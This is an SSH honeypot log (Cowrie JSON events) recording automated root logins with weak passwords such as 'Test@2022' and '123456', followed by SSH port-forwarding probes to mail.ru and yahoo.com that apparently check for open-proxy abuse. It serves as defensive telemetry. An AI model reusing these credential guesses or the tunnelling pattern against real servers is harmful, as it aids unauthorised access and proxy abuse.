{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.705541Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.954170Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:40.958148Z","src_ip":"212.227.235.229","session":"56880aaea8ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6663,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6663","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.004982Z","session":"a8631b68c888"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.055125Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":24581,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24581","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.196177Z","session":"a8631b68c888"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.245913Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3350,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3350","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.388186Z","session":"a8631b68c888"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.438073Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.488821Z","src_ip":"77.83.207.83","session":"a8631b68c888"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62852,"dst_ip":"1.2.3.4","dst_port":22,"session":"b48bbbca1014","protocol":"ssh","message":"New connection: 77.83.207.83:62852 (1.2.3.4:22) [session: b48bbbca1014]","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.538290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.539136Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.589298Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.838799Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10068,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10068","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.891575Z","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:41.941723Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":30186,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30186","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.084472Z","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.134481Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":11038,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11038","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.276469Z","session":"b48bbbca1014"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.326580Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.377387Z","src_ip":"77.83.207.83","session":"b48bbbca1014"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":62942,"dst_ip":"1.2.3.4","dst_port":22,"session":"03bb27ea1e74","protocol":"ssh","message":"New connection: 77.83.207.83:62942 (1.2.3.4:22) [session: 03bb27ea1e74]","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.426724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.427841Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.478140Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.728984Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27624,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27624","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.780212Z","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.830582Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":2311,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2311","sensor":"my-vps","timestamp":"2025-08-31T03:47:42.972694Z","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.023058Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":7663,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7663","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.164699Z","session":"03bb27ea1e74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.215092Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.266109Z","src_ip":"77.83.207.83","session":"03bb27ea1e74"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63033,"dst_ip":"1.2.3.4","dst_port":22,"session":"87b3471b1aae","protocol":"ssh","message":"New connection: 77.83.207.83:63033 (1.2.3.4:22) [session: 87b3471b1aae]","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.314650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.315547Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.365487Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.614326Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11279,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11279","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.665971Z","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.716071Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15665,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15665","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.856293Z","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:43.906500Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":11787,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11787","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.048294Z","session":"87b3471b1aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.098440Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.149416Z","src_ip":"77.83.207.83","session":"87b3471b1aae"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63117,"dst_ip":"1.2.3.4","dst_port":22,"session":"32f10de3ab6f","protocol":"ssh","message":"New connection: 77.83.207.83:63117 (1.2.3.4:22) [session: 32f10de3ab6f]","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.198141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.199320Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.248957Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.497639Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2625,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2625","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.548681Z","session":"32f10de3ab6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.598578Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":27990,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27990","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.740169Z","session":"32f10de3ab6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:44.790139Z","src_ip":"77.83.207.83","session":"32f10de3ab6f"}
